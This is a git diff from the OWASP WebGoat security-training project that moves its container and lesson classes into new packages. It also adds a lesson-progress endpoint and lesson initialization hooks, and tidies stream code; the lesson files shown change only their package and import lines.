diff --git a/src/main/java/org/owasp/webgoat/container/service/LessonProgressService.java b/src/main/java/org/owasp/webgoat/container/service/LessonProgressService.java
new file mode 100644
index 000000000..73deb7b60
--- /dev/null
+++ b/src/main/java/org/owasp/webgoat/container/service/LessonProgressService.java
@@ -0,0 +1,59 @@
+package org.owasp.webgoat.container.service;
+
+import lombok.AllArgsConstructor;
+import lombok.Getter;
+import lombok.RequiredArgsConstructor;
+import org.owasp.webgoat.container.lessons.Assignment;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import java.util.List;
+
+
+/**
+ * <p>LessonProgressService class.</p>
+ *
+ * @author webgoat
+ */
+@Controller
+@RequiredArgsConstructor
+public class LessonProgressService {
+
+    private final UserTrackerRepository userTrackerRepository;
+    private final WebSession webSession;
+
+    /**
+     * Endpoint for fetching the complete lesson overview which informs the user about whether all the assignments are solved.
+     * Used as the last page of the lesson to generate a lesson overview.
+     *
+     * @return list of assignments
+     */
+    @RequestMapping(value = "/service/lessonoverview.mvc", produces = "application/json")
+    @ResponseBody
+    public List<LessonOverview> lessonOverview() {
+        var userTracker = userTrackerRepository.findByUser(webSession.getUserName());
+        var currentLesson = webSession.getCurrentLesson();
+
+        if (currentLesson != null) {
+            var lessonTracker = userTracker.getLessonTracker(currentLesson);
+            return lessonTracker.getLessonOverview().entrySet().stream()
+                    .map(entry -> new LessonOverview(entry.getKey(), entry.getValue()))
+                    .toList();
+        }
+        return List.of();
+    }
+
+    @AllArgsConstructor
+    @Getter
+    //Jackson does not really like returning a map of <Assignment, Boolean> directly, see http://stackoverflow.com/questions/11628698/can-we-make-object-as-key-in-map-when-using-json
+    //so creating intermediate object is the easiest solution
+    private static class LessonOverview {
+
+        private Assignment assignment;
+        private Boolean solved;
+
+    }
+}
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonTitleService.java b/src/main/java/org/owasp/webgoat/container/service/LessonTitleService.java
similarity index 84%
rename from webgoat-container/src/main/java/org/owasp/webgoat/service/LessonTitleService.java
rename to src/main/java/org/owasp/webgoat/container/service/LessonTitleService.java
index 40d4e9459..99006fa0a 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonTitleService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LessonTitleService.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/ReportCardService.java b/src/main/java/org/owasp/webgoat/container/service/ReportCardService.java
similarity index 89%
rename from webgoat-container/src/main/java/org/owasp/webgoat/service/ReportCardService.java
rename to src/main/java/org/owasp/webgoat/container/service/ReportCardService.java
index 811dec524..14c6c2fa9 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/ReportCardService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/ReportCardService.java
@@ -27,18 +27,18 @@
  * https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.Setter;
-import org.owasp.webgoat.i18n.PluginMessages;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.session.Course;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.LessonTracker;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.i18n.PluginMessages;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.session.Course;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.LessonTracker;
+import org.owasp.webgoat.container.users.UserTracker;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/RestartLessonService.java b/src/main/java/org/owasp/webgoat/container/service/RestartLessonService.java
similarity index 82%
rename from webgoat-container/src/main/java/org/owasp/webgoat/service/RestartLessonService.java
rename to src/main/java/org/owasp/webgoat/container/service/RestartLessonService.java
index 4f4a68cf8..d14b4e11c 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/RestartLessonService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/RestartLessonService.java
@@ -22,20 +22,22 @@
  * projects.
  */
 
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
 import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
 import org.flywaydb.core.Flyway;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.lessons.Initializeable;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.UserTracker;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.http.HttpStatus;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseStatus;
 
+import java.util.List;
 import java.util.function.Function;
 
 @Controller
@@ -46,6 +48,7 @@ public class RestartLessonService {
     private final WebSession webSession;
     private final UserTrackerRepository userTrackerRepository;
     private final Function<String, Flyway> flywayLessons;
+    private final List<Initializeable> lessonsToInitialize;
 
     @RequestMapping(path = "/service/restartlesson.mvc", produces = "text/text")
     @ResponseStatus(value = HttpStatus.OK)
@@ -60,5 +63,7 @@ public class RestartLessonService {
         var flyway = flywayLessons.apply(webSession.getUserName());
         flyway.clean();
         flyway.migrate();
+
+        lessonsToInitialize.forEach(i -> i.initialize(webSession.getUser()));
     }
 }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/SessionService.java b/src/main/java/org/owasp/webgoat/container/service/SessionService.java
similarity index 86%
rename from webgoat-container/src/main/java/org/owasp/webgoat/service/SessionService.java
rename to src/main/java/org/owasp/webgoat/container/service/SessionService.java
index e621270ce..6352237e4 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/SessionService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/SessionService.java
@@ -4,11 +4,11 @@
  * and open the template in the editor.
  */
 
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
 import lombok.RequiredArgsConstructor;
-import org.owasp.webgoat.i18n.Messages;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.i18n.Messages;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/session/Course.java b/src/main/java/org/owasp/webgoat/container/session/Course.java
similarity index 83%
rename from webgoat-container/src/main/java/org/owasp/webgoat/session/Course.java
rename to src/main/java/org/owasp/webgoat/container/session/Course.java
index 7a18dc743..349150c4e 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/session/Course.java
+++ b/src/main/java/org/owasp/webgoat/container/session/Course.java
@@ -1,13 +1,11 @@
-package org.owasp.webgoat.session;
+package org.owasp.webgoat.container.session;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 
 import java.util.List;
 
-import static java.util.stream.Collectors.toList;
-
 /**
  * ************************************************************************************************
  * <p>
@@ -41,9 +39,9 @@ import static java.util.stream.Collectors.toList;
 @Slf4j
 public class Course {
 
-    private List<? extends Lesson> lessons;
+    private List<Lesson> lessons;
 
-    public Course(List<? extends Lesson> lessons) {
+    public Course(List<Lesson> lessons) {
         this.lessons = lessons;
     }
 
@@ -53,7 +51,7 @@ public class Course {
      * @return The categories value
      */
     public List<Category> getCategories() {
-        return lessons.parallelStream().map(l -> l.getCategory()).distinct().sorted().collect(toList());
+        return lessons.parallelStream().map(Lesson::getCategory).distinct().sorted().toList();
     }
 
     /**
@@ -72,18 +70,18 @@ public class Course {
      *
      * @return a {@link java.util.List} object.
      */
-    public List<? extends Lesson> getLessons() {
+    public List<Lesson> getLessons() {
         return this.lessons;
     }
 
     /**
      * <p>Getter for the field <code>lessons</code>.</p>
      *
-     * @param category a {@link org.owasp.webgoat.lessons.Category} object.
+     * @param category a {@link org.owasp.webgoat.container.lessons.Category} object.
      * @return a {@link java.util.List} object.
      */
     public List<Lesson> getLessons(Category category) {
-        return this.lessons.stream().filter(l -> l.getCategory() == category).collect(toList());
+        return this.lessons.stream().filter(l -> l.getCategory() == category).toList();
     }
 
     public void setLessons(List<Lesson> lessons) {
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/session/LabelDebugger.java b/src/main/java/org/owasp/webgoat/container/session/LabelDebugger.java
similarity index 84%
rename from webgoat-container/src/main/java/org/owasp/webgoat/session/LabelDebugger.java
rename to src/main/java/org/owasp/webgoat/container/session/LabelDebugger.java
index af030c7ea..69823e7b4 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/session/LabelDebugger.java
+++ b/src/main/java/org/owasp/webgoat/container/session/LabelDebugger.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.session;
+package org.owasp.webgoat.container.session;
 
 import java.io.Serializable;
 
@@ -37,7 +37,7 @@ public class LabelDebugger implements Serializable {
 
     /**
      * <p>Sets the status to enabled</p>
-     * @param enabled {@link org.owasp.webgoat.session.LabelDebugger} object
+     * @param enabled {@link org.owasp.webgoat.container.session.LabelDebugger} object
      */
     public void setEnabled(boolean enabled)  {
         this.enabled = enabled;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/session/UserSessionData.java b/src/main/java/org/owasp/webgoat/container/session/UserSessionData.java
similarity index 94%
rename from webgoat-container/src/main/java/org/owasp/webgoat/session/UserSessionData.java
rename to src/main/java/org/owasp/webgoat/container/session/UserSessionData.java
index 1e1229e40..2e58caf0f 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/session/UserSessionData.java
+++ b/src/main/java/org/owasp/webgoat/container/session/UserSessionData.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.session;
+package org.owasp.webgoat.container.session;
 
 import java.util.HashMap;
 
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java b/src/main/java/org/owasp/webgoat/container/session/WebSession.java
similarity index 92%
rename from webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java
rename to src/main/java/org/owasp/webgoat/container/session/WebSession.java
index d7a64984b..f8b2296d2 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java
+++ b/src/main/java/org/owasp/webgoat/container/session/WebSession.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.session;
+package org.owasp.webgoat.container.session;
 
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.users.WebGoatUser;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.users.WebGoatUser;
 import org.springframework.security.core.context.SecurityContextHolder;
 
 import java.io.Serializable;
@@ -73,6 +73,10 @@ public class WebSession implements Serializable {
         return currentUser.getUsername();
     }
 
+    public WebGoatUser getUser() {
+        return currentUser;
+    }
+
     public void toggleSecurity() {
         this.securityEnabled = !this.securityEnabled;
     }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/LessonTracker.java b/src/main/java/org/owasp/webgoat/container/users/LessonTracker.java
similarity index 93%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/LessonTracker.java
rename to src/main/java/org/owasp/webgoat/container/users/LessonTracker.java
index b24894584..ab882c29a 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/LessonTracker.java
+++ b/src/main/java/org/owasp/webgoat/container/users/LessonTracker.java
@@ -1,9 +1,9 @@
 
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import lombok.Getter;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Assignment;
 
 import javax.persistence.*;
 import java.util.*;
@@ -76,7 +76,7 @@ public class LessonTracker {
      * @param solvedAssignment the assignment which the user solved
      */
     public void assignmentSolved(String solvedAssignment) {
-        getAssignment(solvedAssignment).ifPresent(a -> solvedAssignments.add(a));
+        getAssignment(solvedAssignment).ifPresent(solvedAssignments::add);
     }
 
     /**
@@ -106,7 +106,7 @@ public class LessonTracker {
     public Map<Assignment, Boolean> getLessonOverview() {
         List<Assignment> notSolved = allAssignments.stream()
                 .filter(i -> !solvedAssignments.contains(i))
-                .collect(Collectors.toList());
+                .toList();
         Map<Assignment, Boolean> overview = notSolved.stream().collect(Collectors.toMap(a -> a, b -> false));
         overview.putAll(solvedAssignments.stream().collect(Collectors.toMap(a -> a, b -> true)));
         return overview;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/RegistrationController.java b/src/main/java/org/owasp/webgoat/container/users/RegistrationController.java
similarity index 95%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/RegistrationController.java
rename to src/main/java/org/owasp/webgoat/container/users/RegistrationController.java
index 754046f4c..d3d645796 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/RegistrationController.java
+++ b/src/main/java/org/owasp/webgoat/container/users/RegistrationController.java
@@ -1,7 +1,6 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import lombok.AllArgsConstructor;
-import lombok.SneakyThrows;
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.security.authentication.AuthenticationManager;
 import org.springframework.stereotype.Controller;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/Scoreboard.java b/src/main/java/org/owasp/webgoat/container/users/Scoreboard.java
similarity index 62%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/Scoreboard.java
rename to src/main/java/org/owasp/webgoat/container/users/Scoreboard.java
index 7b4cce443..6eb2e6508 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/Scoreboard.java
+++ b/src/main/java/org/owasp/webgoat/container/users/Scoreboard.java
@@ -1,16 +1,16 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
-import org.owasp.webgoat.i18n.PluginMessages;
-import org.owasp.webgoat.session.Course;
+import org.owasp.webgoat.container.i18n.PluginMessages;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.session.Course;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RestController;
 
 import java.util.ArrayList;
-import java.util.Comparator;
 import java.util.List;
-import java.util.stream.Collectors;
+import java.util.Optional;
 
 /**
  * Temp endpoint just for the CTF.
@@ -39,38 +39,35 @@ public class Scoreboard {
         List<WebGoatUser> allUsers = userRepository.findAll();
         List<Ranking> rankings = new ArrayList<>();
         for (WebGoatUser user : allUsers) {
-        	if (user.getUsername().startsWith("csrf-")) {
-        		//the csrf- assignment specific users do not need to be in the overview
-        		continue;
-        	}
+            if (user.getUsername().startsWith("csrf-")) {
+                //the csrf- assignment specific users do not need to be in the overview
+                continue;
+            }
             UserTracker userTracker = userTrackerRepository.findByUser(user.getUsername());
             rankings.add(new Ranking(user.getUsername(), challengesSolved(userTracker)));
         }
         /* sort on number of captured flags to present an ordered ranking */
-        rankings.sort(new Comparator<Ranking>() {
-
-			@Override
-			public int compare(Ranking o1, Ranking o2) {
-				
-				return o2.getFlagsCaptured().size() - o1.getFlagsCaptured().size();
-			}
-		});
+        rankings.sort((o1, o2) -> o2.getFlagsCaptured().size() - o1.getFlagsCaptured().size());
         return rankings;
     }
 
     private List<String> challengesSolved(UserTracker userTracker) {
         List<String> challenges = List.of("Challenge1", "Challenge2", "Challenge3", "Challenge4", "Challenge5", "Challenge6", "Challenge7", "Challenge8", "Challenge9");
         return challenges.stream()
-                .map(c -> userTracker.getLessonTracker(c))
-                .filter(l -> l.isPresent()).map(l -> l.get())
-                .filter(l -> l.isLessonSolved())
-                .map(l -> l.getLessonName())
-                .map(l -> toLessonTitle(l))
-                .collect(Collectors.toList());
+                .map(userTracker::getLessonTracker)
+                .flatMap(Optional::stream)
+                .filter(LessonTracker::isLessonSolved)
+                .map(LessonTracker::getLessonName)
+                .map(this::toLessonTitle)
+                .toList();
     }
 
     private String toLessonTitle(String id) {
-        String titleKey = course.getLessons().stream().filter(l -> l.getId().equals(id)).findFirst().get().getTitle();
+        String titleKey = course.getLessons().stream()
+                .filter(l -> l.getId().equals(id))
+                .findFirst()
+                .map(Lesson::getTitle)
+                .orElse("No title");
         return pluginMessages.getMessage(titleKey, titleKey);
     }
 }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserForm.java b/src/main/java/org/owasp/webgoat/container/users/UserForm.java
similarity index 93%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/UserForm.java
rename to src/main/java/org/owasp/webgoat/container/users/UserForm.java
index e88ea5c47..2cc73ba62 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserForm.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserForm.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import lombok.Getter;
 import lombok.Setter;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserRepository.java b/src/main/java/org/owasp/webgoat/container/users/UserRepository.java
similarity index 88%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/UserRepository.java
rename to src/main/java/org/owasp/webgoat/container/users/UserRepository.java
index 96472a963..322ff8e66 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserRepository.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserRepository.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import org.springframework.data.jpa.repository.JpaRepository;
 
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserService.java b/src/main/java/org/owasp/webgoat/container/users/UserService.java
similarity index 89%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/UserService.java
rename to src/main/java/org/owasp/webgoat/container/users/UserService.java
index ca3058a06..a2b7566fe 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserService.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserService.java
@@ -1,9 +1,8 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import lombok.AllArgsConstructor;
 import org.flywaydb.core.Flyway;
-import org.flywaydb.core.api.configuration.FluentConfiguration;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.lessons.Initializeable;
 import org.springframework.jdbc.core.JdbcTemplate;
 import org.springframework.security.core.userdetails.UserDetailsService;
 import org.springframework.security.core.userdetails.UsernameNotFoundException;
@@ -24,6 +23,7 @@ public class UserService implements UserDetailsService {
     private final UserTrackerRepository userTrackerRepository;
     private final JdbcTemplate jdbcTemplate;
     private final Function<String, Flyway> flywayLessons;
+    private final List<Initializeable> lessonInitializables;
 
     @Override
     public WebGoatUser loadUserByUsername(String username) throws UsernameNotFoundException {
@@ -32,6 +32,7 @@ public class UserService implements UserDetailsService {
             throw new UsernameNotFoundException("User not found");
         } else {
             webGoatUser.createUser();
+            lessonInitializables.forEach(l -> l.initialize(webGoatUser));
         }
         return webGoatUser;
     }
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserSession.java b/src/main/java/org/owasp/webgoat/container/users/UserSession.java
similarity index 90%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/UserSession.java
rename to src/main/java/org/owasp/webgoat/container/users/UserSession.java
index 5e00333b4..f742fd02e 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserSession.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserSession.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import lombok.AccessLevel;
 import lombok.AllArgsConstructor;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTracker.java b/src/main/java/org/owasp/webgoat/container/users/UserTracker.java
similarity index 96%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/UserTracker.java
rename to src/main/java/org/owasp/webgoat/container/users/UserTracker.java
index e967a9c7e..0850f0eac 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTracker.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserTracker.java
@@ -1,9 +1,9 @@
 
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Assignment;
 
 import javax.persistence.*;
 import java.util.HashSet;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTrackerRepository.java b/src/main/java/org/owasp/webgoat/container/users/UserTrackerRepository.java
similarity index 84%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/UserTrackerRepository.java
rename to src/main/java/org/owasp/webgoat/container/users/UserTrackerRepository.java
index efa231d59..c80db503c 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTrackerRepository.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserTrackerRepository.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import org.springframework.data.jpa.repository.JpaRepository;
 
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserValidator.java b/src/main/java/org/owasp/webgoat/container/users/UserValidator.java
similarity index 95%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/UserValidator.java
rename to src/main/java/org/owasp/webgoat/container/users/UserValidator.java
index ce63a3ef7..fc1d6691a 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserValidator.java
+++ b/src/main/java/org/owasp/webgoat/container/users/UserValidator.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import lombok.AllArgsConstructor;
 import org.springframework.stereotype.Component;
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/WebGoatUser.java b/src/main/java/org/owasp/webgoat/container/users/WebGoatUser.java
similarity index 89%
rename from webgoat-container/src/main/java/org/owasp/webgoat/users/WebGoatUser.java
rename to src/main/java/org/owasp/webgoat/container/users/WebGoatUser.java
index e6e720c36..f64462348 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/WebGoatUser.java
+++ b/src/main/java/org/owasp/webgoat/container/users/WebGoatUser.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import lombok.Getter;
 import org.springframework.security.core.GrantedAuthority;
@@ -85,6 +85,13 @@ public class WebGoatUser implements UserDetails {
         return this.user.isEnabled();
     }
 
+    public boolean equals(Object obj) {
+        return obj instanceof WebGoatUser webGoatUser && this.user.equals(webGoatUser.user);
+    }
+
+    public int hashCode() {
+        return user.hashCode();
+    }
 
 }
 
diff --git a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/auth_bypass/AccountVerificationHelper.java b/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AccountVerificationHelper.java
similarity index 98%
rename from webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/auth_bypass/AccountVerificationHelper.java
rename to src/main/java/org/owasp/webgoat/lessons/auth_bypass/AccountVerificationHelper.java
index 7d312b2bc..2d173cef6 100644
--- a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/auth_bypass/AccountVerificationHelper.java
+++ b/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AccountVerificationHelper.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.auth_bypass;
+package org.owasp.webgoat.lessons.auth_bypass;
 
 import java.util.HashMap;
 import java.util.Map;
diff --git a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/auth_bypass/AuthBypass.java b/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AuthBypass.java
similarity index 89%
rename from webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/auth_bypass/AuthBypass.java
rename to src/main/java/org/owasp/webgoat/lessons/auth_bypass/AuthBypass.java
index 92f1f2250..4e885e1cd 100644
--- a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/auth_bypass/AuthBypass.java
+++ b/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AuthBypass.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.auth_bypass;
+package org.owasp.webgoat.lessons.auth_bypass;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/auth_bypass/VerifyAccount.java b/src/main/java/org/owasp/webgoat/lessons/auth_bypass/VerifyAccount.java
similarity index 91%
rename from webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/auth_bypass/VerifyAccount.java
rename to src/main/java/org/owasp/webgoat/lessons/auth_bypass/VerifyAccount.java
index 3f6ff0b18..1988c6f85 100644
--- a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/auth_bypass/VerifyAccount.java
+++ b/src/main/java/org/owasp/webgoat/lessons/auth_bypass/VerifyAccount.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.auth_bypass;
+package org.owasp.webgoat.lessons.auth_bypass;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictions.java b/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictions.java
similarity index 89%
rename from webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictions.java
rename to src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictions.java
index 34a9341ca..7263f85bd 100644
--- a/webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictions.java
+++ b/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictions.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.bypass_restrictions;
+package org.owasp.webgoat.lessons.bypass_restrictions;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictionsFieldRestrictions.java b/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFieldRestrictions.java
similarity index 92%
rename from webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictionsFieldRestrictions.java
rename to src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFieldRestrictions.java
index 55acae9fd..7f87f0ff6 100644
--- a/webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictionsFieldRestrictions.java
+++ b/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFieldRestrictions.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.bypass_restrictions;
+package org.owasp.webgoat.lessons.bypass_restrictions;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
